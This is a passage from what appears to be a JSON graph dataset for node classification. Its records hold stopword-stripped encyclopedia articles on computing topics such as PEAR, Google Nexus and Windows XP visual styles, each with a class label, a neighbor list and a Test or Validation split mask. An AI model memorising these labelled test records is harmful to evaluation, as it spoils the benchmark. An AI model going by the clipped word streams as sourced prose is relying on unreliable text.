    "text": "Memory_model_(programming):memory model programming computing memory model describes interactions threads memory shared use data memory model allows compiler perform many important optimizations compiler optimizations like loop fusion move statements program influence order read write operations potentially shared variables changes ordering reads writes cause race conditions without memory model compiler allowed apply optimizations multi-threaded programs general special cases modern programming languages like java therefore implement memory model memory model specifies synchronization barriers established via special well-defined synchronization operations acquiring lock entering synchronized block method memory model stipulates changes values shared variables need made visible threads synchronization barrier reached moreover entire notion race condition defined order operations respect memory barriers semantics give optimizing compilers higher degree freedom applying optimizations compiler needs make sure values potentially shared variables synchronization barriers guaranteed optimized unoptimized code particular reordering statements block code contains synchronization barrier assumed safe compiler research area memory models revolves around java memory model first attempt provide comprehensive threading memory model popular programming language established threads could implemented safely library without placing certain restrictions implementation particular c c++ standards c99 c++03 lacked necessary restrictions c++ threading subcommittee set work suitable memory model 2005 submitted c working document n1131 get c committee board efforts final revision proposed memory model c++ n2429 accepted c++ draft standard october 2007 meeting kona memory model included next c++ c standards c++11 c11",
    "neighbors": [
      2529,
      6184,
      5677,
      10672,
      2804,
      2201,
      2620,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 188,
    "label": 6,
    "text": "TRANS.TBL:trans.tbl trans.tbl file iso 9660 compact disc computer data filesystems used provide flexible filenames basic ones allowed iso 9660 standard common way providing long filenames early computer cds rock ridge joliet romeo extensions became widespread strictly created iso 9660 filenames contain 8 capital letters digits followed period three capital letters digits trans.tbl simply normal file directory containing extended versions file names directory system reading filesystem use extended filenames sometimes called long filenames instead iso ones trans.tbl file plain ascii text file line contains three fields separated arbitrary amount whitespace implementations create trans.tbl files put single space file type iso 9660 name arbitrary number tabs iso 9660 filename extended filename native support using trans.tbl still exists many iso 9660 implementations particularly related unix however trans.tbl long since superseded rock ridge joliet extensions iso 9660 modern utilities create iso 9660 images either ca n't create trans.tbl files longer create unless explicitly requested user since trans.tbl file special identification name also created separately included directory filesystem creation modified version trans.tbl file root directory centos installation cd showing iso 9660 extended versions filename",
    "neighbors": [
      5413,
      5062,
      8110,
      5231,
      5492,
      9972
    ],
    "mask": "None"
  },
  {
    "node_id": 189,
    "label": 7,
    "text": "24SevenOffice:24sevenoffice 24sevenoffice norwegian software company headquarters oslo norway offices stockholm sweden london uk founded 1997 company specializes web-based saas enterprise resource planning systems 24sevenoffice started 1997 porsgrunn norway company name ikt interactive marketed kontorplassen.no name 24sevenoffice introduced company london branch company entered british market 2003 company changed name 24sevenoffice february 2005 originally based skien company later moved oslo innovation center establishing current headquarters tjuvholmen waterfront fjord city oslo idea company product developed 1996 24sevenoffice early innovator scandinavian market terms web-based enterprise resource planning-solutions erp british office established surrey business park may 2003 company launching web-based saas utility computing system uk sme market 2004 office chennai india established 2005 24sevenoffice entered swedish market acquired leading competitor erp-provider start run cash deal august 2005 company initial public offering raised million company entered list 5 october 2005 ticker 24so reaching market value million 5000 customers norway 2006 company signed deal sponsor rally driver petter solberg largest private sponsorship norwegian sport time instead receiving nok 5 million cash solberg received 2.9 percent ownership company german-speaking market entered april 2006 office frankfurt main opened late august/early september established office ten sales agents plus general manager stockholm swedish market 24sevenoffice initiated strategic cooperation active 24 early 2006 develop common platform summer active 24 bought 24sevenoffice erp/crm competitor 24sevenoffice terminated contract active 24 october demanding nok 200 million compensation lost revenue breakdown settlement negotiations january 2007 24sevenoffice filed case active 24 breach agreement oslo district court march 24sevenoffice lost counts district court december 2007 january 2008 24sevenoffice appealed case borgarting court appeal reducing cause action nok 250 million 30 million 24sevenoffice lost counts court appeal december 2008 ordered cover costs incurred active 24 connection dispute totaling nok 6.91 million 24sevenoffice appealed case supreme court norway supreme court appeals committee march 2008 unanimously rejected appeal 24sevenoffice borgarting appeal court unanimous judgment december 2008 counterclaim active 24 mamut 24sevenoffice oslo district court may 2010 found 24sevenoffice pay active 24 nok 12 million compensation wrongfully terminated agreement nok 360.000 opponent legal costs 24sevenoffice disagreed court ruling appealed borgarting court appeal november 2011 ruled reduce amount damages nok 4.4 million plus nok 900.000 penal interest several scrip issues 24sevenoffice raised 25 million nok 4 million time october 2005 july 2006 entered strategic partnership 30 years delivered digital services payroll human resource planning recruitment training march 2006 made large-scale agreement april 2006 us telecommunications software company webex competitor norwegian tandberg videoconferencing equipment manufacturer september 2006 24sevenoffice signed agreement fokus bank provide customers extended functionality internet banking 24sevenoffice 2007 reportedly 9000 customers joined openajax alliance entered strategic partnership dun bradstreet may 2007 despite getting listed oslo axess 22 june ticker tfso reaching market capitalization nok 120 million company still losing money company ended 2007 revenue nok 21.7 million 2008 24sevenoffice bought 50 stocks telecommunication company oyatel partnered nets group facilitate invoicing businesses telecommunications company telipol choose 24sevenoffice second-generation internet platform 8,000 users announced increase revenues q2 11.1 million 4.7 million period year 24sevenoffice turnover nok 37 million first half 2009 doubling compared period previous year presented first positive ebitda q2 24sevenoffice web-based saas erp system includes modules crm accounting invoicing e-mail file/document management project management 24sevenoffice seal excellence multimedia award 2004 cebit became year 2004 chosen dagens næringsliv dun bradstreet product year norwegian finance magazine kapital magazine innovation award 2008",
    "neighbors": [
      803
    ],
    "mask": "Test"
  },
  {
    "node_id": 190,
    "label": 2,
    "text": "PEAR:pear php extension application repository pear repository php software code stig s. bakken founded pear project 1999 promote re-use code performs common functions project seeks provide structured library code maintain system distributing code managing code packages promote standard coding style though community-driven pear project pear group serves governing body takes care administrative tasks pear code package comprises independent project pear umbrella development team versioning-control documentation pear package distributed gzipped tar file archive consists source code written php many pear packages readily used developers ordinary third party code via simple include statements php elegantly pear package manager comes php default may used install pear packages extra functionality provided package appears integrated part php installation unlike comprehensive perl archive network cpan archives pear packages implicit dependencies package placement pear package tree relate code dependencies rather pear packages must explicitly declare dependencies pear packages pear base classes contain code simulating object-oriented destructors consistent error-handling packages exist many basic php functions including authentication caching database access encryption configuration html web services xml pear means “ php extension application repository. ” framework distribution system reusable php components extends php gives higher level programming web developers pear divided three different classes pear core components pear packages pecl packages pear packages include functionality giving authentication networking file system features tools working html xml templates pear package manager provides standardized way install uninstall upgrade new pear packages pecl extensions installing package also instructed take care package dependencies extra needed packages installed pear package manager run command line using codice_1 command usually therefore server administrator alter installed base pear pecl extensions php installations running linux pear package manager ready usage default windows pear package manager available running batch file called codice_2 pyrus attempt undertaken redesign improve pear ground php 5.3 newer pyrus used install packages pear channels last release march 2011 development might discontinued due popularity composer composer alternative available managing packages php project composer also supports installation pear packages people php community argue replacing pear favor composer php extension community library pecl pronounced 'pickle conceptually similar pear indeed pecl modules installed pear package manager pecl contains c extensions compiling php c programs pecl extensions run efficiently pear packages pecl includes modules xml-parsing access additional databases mail-parsing embedding perl python php scripts compiling php scripts pecl spun pear project october 2003 pecl extensions documented alongside standard extensions within php manual special manual pecl extensions also several extensions began development cycle pecl ended core distributed php source many cases pecl versions become unmaintained",
    "neighbors": [
      10760,
      1034,
      6154,
      2062,
      8213,
      6680,
      9245,
      5155,
      8739,
      5670,
      7722,
      3629,
      5165,
      5677,
      10817,
      4171,
      595,
      3667,
      6227,
      11357,
      102,
      7785,
      9324,
      1138,
      2168,
      3705,
      7293,
      6797,
      148,
      10900,
      10394,
      4775,
      4777,
      6828,
      8883,
      692,
      5819,
      6338,
      4302,
      2259,
      6361,
      8413,
      741,
      231,
      2281,
      2804,
      4853,
      6393,
      11525,
      7435,
      7947,
      9487,
      788,
      1812,
      1813,
      5397,
      8476,
      10526,
      3876,
      2348,
      6446,
      1842,
      7987,
      823,
      2872,
      5433,
      6465,
      2372,
      1353,
      3918,
      4951,
      10587,
      9564,
      6493,
      2401,
      1379,
      9063,
      8554,
      10096,
      1920,
      8068,
      3462,
      8582,
      2955,
      9614,
      2465,
      4529,
      6583,
      5048,
      6074,
      10172,
      9151,
      9666,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      4561,
      4056,
      2010,
      479,
      3553,
      7140,
      6119,
      5096,
      7147,
      5612,
      1522,
      8691,
      3573,
      11259,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 191,
    "label": 9,
    "text": "Tactile_programming_language:tactile programming language tactile programming specification development interaction interpretation computer programs touch-centric interface based ideas behind visual programming languages particularly interaction development software visual-graphic rather text-based interpretations dragged-and-dropped mouse order develop software functionality however tactile programming applies visual programming paradigm within touch-centric framework moment example exist tactile programming ides visual agentalk implemented within agentsheets similar drag drop programming found etoys language part squeak alice scratch",
    "neighbors": [
      9345,
      2691,
      9224,
      5395,
      5651,
      5527,
      9626,
      3613,
      4770,
      5680,
      9780,
      1591,
      4410,
      10819,
      8262,
      9926,
      4042,
      5845,
      477,
      7395,
      4838,
      9330,
      9331,
      2556,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 192,
    "label": 9,
    "text": "CSMP_III:csmp iii csmp iii continuous system modelling program ili early scientific computer software designed modelling solving differential equations numerically enables real-world systems simulated tested computer since early 1961s computer systems able simulate real-world dynamic situations interaction people public building airport terminal models used test stresses imposed engineering structure without risk construction cost modern uses include weather systems analysis effect planet earth due global warming csmp various versions used extensively past software first developed like computer programs analytical simulation programs constructed three general types statements structural statements make use operations addition subtraction multiplication division exponentiation using notation syntax rules used fortran example model includes equation following statement used define variables calculus performed x=6.0*y/w+ z-2.0 **2.0 random variation values added parts model simulate unpredictable behaviour patterns dynamic wind-loaded structures high-rise buildings aircraft wing designs earlier csmp iii text-based programming language superseded variations apl object oriented computer-language modelling versions csmp ooscmp",
    "neighbors": [
      7186,
      2519
    ],
    "mask": "Validation"
  },
  {
    "node_id": 193,
    "label": 3,
    "text": "Elidon:elidon elidon action game developed published orpheus ltd. amstrad cpc commodore 64 msx computers 1985 elidon well received press including review scores 78 amtix 15/20 computer gamer 83 zzap 64",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 194,
    "label": 2,
    "text": "HoloLens_2:hololens 2 microsoft hololens 2 pair mixed reality smartglasses developed manufactured microsoft successor pioneering microsoft hololens february 24 2019 hololens 2 enterprise edition debuted first variant device followed developer edition announced may 2 2019 hololens 2 announced february 24 2019 mwc barcelona spain see hololens 2 on-stage demo mwc 2019 may 7 2019 hololens 2 shown microsoft build showcased application created unreal engine see august 20 2019 hot chips 31 microsoft presented holographic processing unit hpu 2.0 custom design hololens 2 microsoft highlighted three main improvements made device immersiveness ergonomics business friendliness hololens 2 diagonal field view 52 degrees improving 34 degree field view first edition hololens keeping resolution 47 pixels per degree holographic processing unit hpu 2.0 improvements compared hpu 1.0 hololens 2 emulator made available developers april 17 2019 emulator allows developers create applications hololens 2 device ships technical information hololens 2 emulator see microsoft documentation",
    "neighbors": [
      4356,
      11524,
      6797,
      782,
      1935,
      5262,
      10900,
      11546,
      11549,
      7970,
      1832,
      6827,
      7983,
      3890,
      8757,
      9913,
      4289,
      9033,
      10957,
      4051,
      11221,
      11605,
      11103,
      10338,
      617,
      8681,
      1776
    ],
    "mask": "Test"
  },
  {
    "node_id": 195,
    "label": 4,
    "text": "Disposable_camera:disposable camera disposable single-use camera simple box camera meant used use fixed-focus lenses equipped integrated flash unit even waterproof versions underwater photography internally cameras use 135 film aps cartridge disposables contain actual cartridge used loading normal reusable cameras others film wound internally open spool whole camera handed processing cameras recycled i.e refilled film resold cameras returned processing fashion film cameras general one-time-use camera represents return business model pioneered kodak kodak camera predecessor brownie camera particularly popular situations reusable camera would easily stolen damaged one regular camera forgotten one afford regular camera company called photo-pac produced cardboard camera beginning 1949 shot eight exposures mailed-in processing cameras expensive would often left safely home lovely scenes presented frustrated missing photo opportunities h. m. stiles invented way enclose 35mm film inexpensive enclosure without expensive precision film transport mechanism cost 1.29 though incredibly similar familiar single-use cameras today photo-pac failed make permanent impression market 1966 french company called fex introduced disposable bakelite camera called photo pack matic featuring 12 photos 4×4 cm currently familiar disposable camera developed fujifilm 1986 utsurun-desu takes pictures quicksnap line used 35 mm film eastman kodak 1987 fling based 110 film kodak released 35 mm version 1988 1989 renamed 35 mm version funsaver discontinued 110 fling japan utsurun released 1986 1380 yen became widely accepted immediate appeal companies like konica canon nikon soon produced models stay competitive fuji introduced advanced features original model panoramic photography waterproofing inclusion flash cameras even manual zoom feature works shifting two lenses front shutter 2005 disposable cameras staple consumer film camera market flash-equipped disposables norm disposable cameras popular tourists people traveling around world save pictures adventures since late 1990s disposable cameras become increasingly popular wedding favors usually placed tables wedding receptions used guests capture unique perspective event commonly available colors match wedding theme ivory blue white gold etc so-called accident camera kits containing film-based disposable cameras increasingly carried vehicles take images evidence accident absence batteries allows instantaneous usage even extended storage example glove compartment often cheap plastic lenses questionable film quality fixed focal lengths quick 'point shoot ease make disposable camera popular many photographers enjoy 'less perfect style cameras provide move away digital imagery also seen rise popularity 'lomography also led number 'lost art type projects disposable cameras left public spaces message anyone finding camera take images post camera back pass another person low cost cameras makes perfect tool sorts projects digital one-time-use cameras also digital one-time-use camcorders available markets example us saw introduction digital camera 2004 digital disposables success film based counterparts possibly expense process especially compared normal digital camera use poor quality images compared either typical digital camera disposable film camera usually display shows number shots remaining completed camera returned store digital files extracted camera return keeping camera printed stored cd dvd case video camera customer almost digital 'single use cameras successfully hacked eliminate need return store motivations hacking include saving money commonly challenge overcoming artificial impositions 25 shot limit internal memory store 100 images high-voltage photo flash capacitors cameras sometimes extracted used power devices coil guns stun guns homemade geiger counter projects rfid zapper emp devices",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 196,
    "label": 2,
    "text": "Google_Nexus:google nexus google nexus line consumer electronic devices ran android operating system google managed design development marketing support devices development manufacturing carried partnering original equipment manufacturers oems line also included tablets streaming media players though neither type device currently available recent tablet nexus 9 made htc recent streaming media player nexus player made asus devices nexus line considered google flagship android products contained little manufacturer wireless carrier modifications android custom user interfaces although devices sold carriers may sim locked extra branding nexus 6 devices sold example sim locked featured custom boot splash screen logo back device despite otherwise identical hardware unlocked variant verizon galaxy nexus featured verizon logo back received software updates slower pace unlocked variant though featured different hardware accommodate verizon cdma network nexus devices featured unlockable bootloader allow development end-user modification nexus devices often among first android devices receive updates operating system expansion google pixel product line late 2016 google stated ’ want close door completely plan right nexus devices 2017 google partnered hmd global making new nokia phones considered revival nexus nexus one manufactured htc released january 2010 first nexus phone released android 2.1 eclair updated may 2010 first phone android 2.2 froyo updated android 2.3 gingerbread announced google would cease support nexus one whose graphics processing unit gpu poor rendering new 2d acceleration engine ui android 4.0 ice cream sandwich nexus newer models hardware designed handle new rendering nexus device card storage expandability sd nexus manufactured samsung released december 2010 coincide release android 2.3 gingerbread december 2011 updated android 4.0 ice cream sandwich variations later updatable android 4.1 jelly bean july 2012 device support ended 4.1 jelly bean longer receives updates google galaxy nexus manufactured samsung released november 2011 gsm version us version released december 15 2011 coincide release android 4.0 ice cream sandwich device support ended 4.3 jelly bean longer receives updates google device known brazil galaxy x due trademark nexus brand also last nexus device removable battery nexus 4 smartphone also known lg nexus 4 lg mako released november 2012 manufactured lg first android device used android 4.2 jelly bean update version nexus 4 first nexus device wireless charging capabilities updated android 4.3 june 2013 android 4.4 november 2013 run android 5.1 april 2015 nexus 4 following characteristics nexus 5 smartphone manufactured lg scheduled sale october 31 2013 us 349 google play store first device run android 4.4 kitkat nexus 5 receive official android 7.0 nougat update meaning android 6.0.1 marshmallow last officially supported android version device nexus 5 following characteristics nexus 6 smartphone developed motorola originally running android 5.0 lollipop upgradeable android 7.1.1 nougat first announced october 15 2014 along nexus 9 nexus player nexus 5x smartphone developed lg originally running android 6.0 marshmallow first announced september 29 2015 along nexus 6p several google devices pixel c tablet nexus 6p smartphone developed huawei originally running android 6.0 marshmallow first announced september 29 2015 along nexus 5x several google devices pixel c tablet june 27 2012 i/o 2012 keynote presentation google introduced nexus 7 7-inch tablet computer developed manufactured asus released july 2012 first device run android 4.1 jelly bean latest android version supported google device android 5.1.1 lollipop july 24 2013 google breakfast sundar pichai press conference pichai introduced second generation nexus 7 co-developed asus keeping google nexus tradition simultaneously released latest version android 4.3 jelly bean made available july 26 2013 select retailers google play store united states november 20 2013 available google play stores hong kong india day nexus wireless charger made available united states canada december 2015 google released android 6.0.1 marshmallow device nexus 7 2013 receive official android 7.0 nougat update meaning android 6.0.1 marshmallow last officially supported android version tablet nexus 10 10.1-inch tablet manufactured samsung revealed late october 2012 exif data photos taken google executive vic gundotra along leaks manual comprehensive series photos leaked photos revealed design similar samsung galaxy note 10.1 10.1-inch 2560×1600 display 16 32 gb storage android 4.2 dual-core 1.7 ghz exynos 5 processor nexus 10 expected unveiled officially google press event october 29 2012 event postponed due hurricane sandy nexus 10 would receive official updates beyond android 5.1.1 nexus 9 8.9-inch tablet running android 5.0 lollipop developed collaboration google htc first announced october 15 2014 along nexus 6 nexus player nexus q discontinued digital media player ran android integrated google play sell us 299 united states complaints lack features price nexus q shelved indefinitely google said needed time make product even better nexus q unofficially replaced chromecast nexus player nexus player streaming media player created collaboration google asus first device running android tv first announced october 15 2014 along nexus 6 nexus 9 may 24 2016 google discontinued sales nexus player march 2018 google confirmed nexus player would receive upcoming version android android pie security updates also ended device upon announcement first nexus device nexus one estate science fiction author philip k. dick claimed nexus one name capitalized intellectual property dick 1968 novel androids dream electric sheep choice name direct reference nexus-6 series androids novel",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      9774,
      3633,
      9266,
      1083,
      10303,
      6212,
      69,
      8262,
      2635,
      4683,
      4685,
      11343,
      3664,
      8280,
      8794,
      8285,
      2658,
      8821,
      6266,
      5755,
      11391,
      1670,
      9863,
      7816,
      5262,
      6800,
      11408,
      2707,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      9913,
      7359,
      3269,
      3782,
      8907,
      10445,
      2259,
      3795,
      1240,
      8921,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      9970,
      3828,
      7926,
      4855,
      6391,
      3836,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      4890,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      2862,
      7983,
      3380,
      7988,
      11062,
      5431,
      2875,
      3900,
      10045,
      8003,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      1400,
      7548,
      1409,
      4995,
      9610,
      6539,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      7068,
      2978,
      10658,
      5028,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      8627,
      4044,
      4048,
      2001,
      479,
      488,
      6632,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 197,
    "label": 4,
    "text": "Cypherpunks_(book):cypherpunks book cypherpunks freedom future internet 2012 book julian assange discussion internet activists cypherpunks jacob appelbaum andy müller-maguhn jérémie zimmermann primary topic society relationship information security book authors warn internet become tool police state world inadvertently heading toward form totalitarianism promote use cryptography protect state surveillance introduction assange says book manifesto ... warning told guardian journalist decca aitkenhead assange later wrote guardian strong cryptography vital tool fighting state oppression saying message book cypherpunks cypherpunks published books content derives discussions june 2012 appelbaum müller-maguhn zimmermann assange tv show world tomorrow",
    "neighbors": [
      1169,
      4435,
      5373,
      9233
    ],
    "mask": "Test"
  },
  {
    "node_id": 198,
    "label": 7,
    "text": "Advanced_Resource_Connector:advanced resource connector advanced resource connector arc grid computing middleware introduced nordugrid provides common interface submission computational tasks different distributed computing systems thus enable grid infrastructures varying size complexity set services utilities providing interface known arc computing element arc-ce arc-ce functionality includes data staging caching developed order support data-intensive distributed computing arc open source software distributed apache license 2.0 arc appeared still often referred nordugrid middleware originally proposed architecture top globus toolkit optimized needs high-energy physics computing large hadron collider experiments first deployment arc nordugrid testbed took place summer 2002 2003 used support complex computations. ref name= eprint arxiv physics/0306013 /ref first stable release arc version 0.4 came april 2004 gnu general public license name advanced resource connector introduced release distinguish middleware infrastructure year swedish national grid project swegrid became first large cross-discipline infrastructure based arc 2005 nordugrid formally established collaboration support coordinate arc development 2006 two closely related projects launched nordic data grid facility deploying pan-nordic e-science infrastructure based arc knowarc focused transforming arc next generation grid middleware arc v0.6 released may 2007 becoming second stable release key feature introduction client library enabling easy development higher-level applications also first arc release making use open standards included support jsdl later year first technology preview next generation arc middleware made available though distributed arc new approach involved switching web service based architecture general substantial re-factorisation core code 2008 nordugrid consortium adopted apache license arc components last stable release 0-line arc v0.8 shipped september 2009 eventually included preview version new execution service a-rex several components like chelonia isis charon arcjobtool gui parallel arc v0.8 eu knowarc project released november 2009 conceptual arc nox suite complete grid solution fully based web service technologies name nox actually indicates release date november year ox may 2011 nordugrid released arc v11.05 adopting ubuntu versioning scheme time release marked complete transition old execution service a-rex accompanying services backwards compatibility existing infrastructures old interfaces execution service information system retained arc free software available nordugrid public repository binary packages variety linux systems source source code also openly available nordugrid svn repository open source development arc middleware coordinated nordugrid collaboration contributions software documentation dissemination activities coming community various projects eu knowarc emi projects ndgf neic various national infrastructure research projects since 2011 arc adopted ubuntu-like versioning schema bundled releases consisting individual components individual components versioning corresponding code tags version core arc packages often used instead formal release number everyday communication arc implements several open grid forum standards particular jsdl glue2 bes ur/rus star 2010-2013 several key arc components notably hed a-rex clients libraries included european middleware initiative emi software stack emi arc became part unified middleware distribution umd european grid infrastructure egi arc basis computing infrastructure nordic data grid facility ndgf 2006-2010 ndgf actively contributed arc development since 2010 provides arc deployment expertise within egi since 2012 ndgf became part nordic e-infrastructure collaboration grid-enabled know-how sharing technology based arc services open standards knowarc sixth framework programme specific targeted research project funded priority ist-2005-2.5.4 advanced grid technologies systems services june 2006 november 2009 many ways project shaped arc main goal make arc based open community standards among key results creation standardized hosting environment arc services hed apart main aim developing arc contributed development standards increased grid arc usage medicine bioinformatics july 2009 knowarc announced contributed integration grid technologies official linux repositories adding globus toolkit components fedora debian repositories",
    "neighbors": [
      10625,
      10721,
      3331,
      5956,
      10020,
      5414,
      3849,
      11658,
      823,
      6797,
      7983,
      9040,
      5654,
      4919,
      11353,
      8122,
      2651,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 199,
    "label": 2,
    "text": "Nokia_N97:nokia n97 nokia n97 high-end smartphone part nseries line nokia announced 2 december 2008 released june 2009 successor nokia n96 n97 nokia second s60-based touchscreen phone nokia 5800 xpressmusic features slide-out qwerty keyboard n97 runs symbian v9.4 symbian^1/s60 5th edition design mostly based nokia n79 smaller 'mini variant later released nokia flagship time touchscreen devices becoming increasingly prevalent n97 highly anticipated despite good sales considered disaster hardware software sides thought contributed nokia decline nokia executive admitted 2010 n97 regrettable failure nokia n97 released us flagship stores 9 june 2009 26 june 2009 released worldwide september 2009 two million n97 handsets reportedly sold three months following release n97 shipped trial versions quick office adobe reader boingo joikuspot ovi maps ovi store initial software mixed reception prompting release new firmware october 2009 nokia released new firmware kinetic scrolling n97 address major issues present firmware device launched october 2009 n97 mini downsized version original n97 made available n97 mini generally seen improvement original n97 informal tests shown battery last nearly two days regular use phone various features original n97 nokia quoted following claimed operating times optional dvb-h nokia mobile tv receiver su-33w possible watch television phone compatible nokia n-gage platform touchscreen common criticisms original n97 relative lack ram free disk space c drive around 50 mb free ram available boot phone become sluggish close programs order conserve memory many first party applications also install c around 50 mb free space used quickly also temporary os files placed issue resolved n97 mini user often 250 mb free space c drive memory mapping alteration firmware version 20 allowed applications use less ram free better helping ease strain lower amount free ram end-user anssi vanjoki evp markets nokia admitted quality control software issue device saying tremendous disappointment terms experience quality consumers though according vanjoki later repaired firmware updates steve litchfield symbian 2011 blog post wrote n97 really device ruled world almost literally everything yet became one device nokia literally apologise publicly one device became millstone around neck nokia acknowledged many devices cover lens mounted close causing scratches dust debris later units nokia reportedly fixed issue others original n97 speed problems built gps lock phones easily lose track current location making free turn turn navigation software provided nokia unusable users lens cover gps issues fixed warranty official nokia service centre despite nokia phones great signal reception nokia n97 follow tradition poor overall signal strength even comparison phones placed side side n97 connected network user interface s60 5th edition software platform built top symbian os 9.4 criticized site techradar inconsistent menu items require two taps activated 2010 nokia officially apologized number customers experienced issues n97 buggy software led large number potential customers choosing brands nokia time period despite generally lukewarm reviews phone sold well however marketing iphone killer tarnished nokia smartphone reputation time n97 mini downsized version n97 available since october 2009 n97 mini downsized features original n97 8 gb storage memory touchscreen shorter battery life uses 2.0 nokia n97 software default also redesign keypad first big d-pad left side replaced four arrow keys right side also space keys keys little bit higher giving much better feel typing major differences listed following table limited edition called n97 mini raoul limited edition released relation fashion house fj benjamin raoul brand also features new fashion asia widget went sale late october 2009 malaysia singapore user interface s60 5th edition software platform built top symbian os 9.4 criticized site techradar inconsistent menu items require two taps activated compared original n97 cheaper n97 mini reviewed improvement especially keyboard three phones considered successors n97 firstly n8 became new multimedia flagship 2010 also c6 similar sliding-out qwerty keyboard however since c6 uses specifications maemo-powered n900 also featuring keyboard yet considerably better specifications considered successor",
    "neighbors": [
      1537,
      4609,
      9732,
      11271,
      529,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      9262,
      10802,
      7220,
      5175,
      1083,
      6216,
      9292,
      7246,
      1615,
      5201,
      7253,
      5211,
      6748,
      1633,
      109,
      6276,
      3205,
      9359,
      659,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      4283,
      1216,
      1728,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      737,
      9443,
      3300,
      4324,
      7399,
      8423,
      2285,
      1776,
      8433,
      8472,
      11545,
      1833,
      821,
      10053,
      6996,
      854,
      10583,
      10599,
      6505,
      5998,
      8577,
      11655,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      9137,
      7617,
      967,
      9163,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 200,
    "label": 2,
    "text": "Windows_XP_visual_styles:windows xp visual styles windows xp visual styles customizations graphical user interface windows xp luna royale zune embedded codenames official visual styles designed windows xp microsoft since windows xp themes include choice visual styles well default luna preinstalled windows xp home professional editions royale preinstalled windows xp media center edition embedded preinstalled windows embedded standard 2009 windows embedded posready 2009 addition preinstalled visual styles microsoft released additional ones download third parties also released visual styles though require modification core windows components work visual styles compatible windows xp editions compared previous versions windows new styles greater emphasis graphical appeal operating system using saturated colors bitmaps throughout interface rounded corners windows visual styles api substantially expanded windows vista later particular common controls styled well nevertheless api remained heavily underdocumented luna moon latin various languages codename default visual style windows xp officially known windows xp style available three color schemes blue default olive green silver critics like theme characterized fisher-price interface officially titled windows classic style less cpu-intensive offers better performance greater color font customization options windows xp includes 22 preset color schemes visual style four optimized visually impaired windows standard scheme default color scheme windows windows 2000 appeared windows vista windows 7 although latter renamed windows classic slightly darker variant standard scheme called windows classic default color scheme windows 98 albeit dark blue desktop background instead green much like pre-release versions windows 2000 appeared windows vista windows 7 schemes appeared previous versions windows windows classic style automatically used safe mode win32 console windows also appears windows server 2003 2008 r2 windows classic theme removed windows server 2012 windows 8 normal use still exists kernel royale also known media center style energy blue originally designed windows xp media center edition 2005 ported windows xp tablet pc edition 2005 accompanied new wallpaper inspired windows xp bliss presents relucent vivid faux-reflective color scheme intense blue green colors royale originally made available december 2004 april 7 2005 microsoft new zealand made royale theme wallpapers new zealand theme available download editions xp windows genuine advantage website longer exists 2019 freeware nature package also available software download websites softpedia one time microsoft also release windows media player visualization skin one time skin released experience pack tablet pc available free installer installed windows xp tablet pc edition devices licensed royale noir looks like darkened version royale blackish bluish purple tint royale noir black start button changes green mouse hovers royale noir leaked finalized microsoft noted imperfections weeks royale noir leaked zune officially released theme package accompany release microsoft new zune media player terms style zune resembles royale royale noir particularly latter displays brown light shadow style first visual style windows xp include differently colored start button green xp windows embedded standard 2009 windows embedded posready 2009 came dedicated visual style called embedded similar royale featuring mix dark blue colors windows loads visual style bears valid microsoft digital certificate third-party visual styles used one windows files called uxtheme.dll altered allow unsigned visual styles microsoft aware practice suggests obtaining newer revision patched uxtheme.dll file case problems occur microsoft updates file applied typically os service pack third-party applications configured work visual styles default title bar window borders windows forms-based applications rendered using user preferred visual style rest application graphical user interface gui rendered classic style two different parts gui rendered using two different software libraries title bar window borders non-client area user controls use windows user remaining controls client area common controls use version 5.8 common controls library version 6.0 common controls library contains user controls common controls developers may configure application user interface displayed user currently-selected visual style forcing rendered using version 6.0 library",
    "neighbors": [
      11270,
      5643,
      4624,
      11283,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2603,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      8315,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      4338,
      3834,
      1791,
      8959,
      11519,
      3856,
      3857,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      5500,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      488,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 201,
    "label": 2,
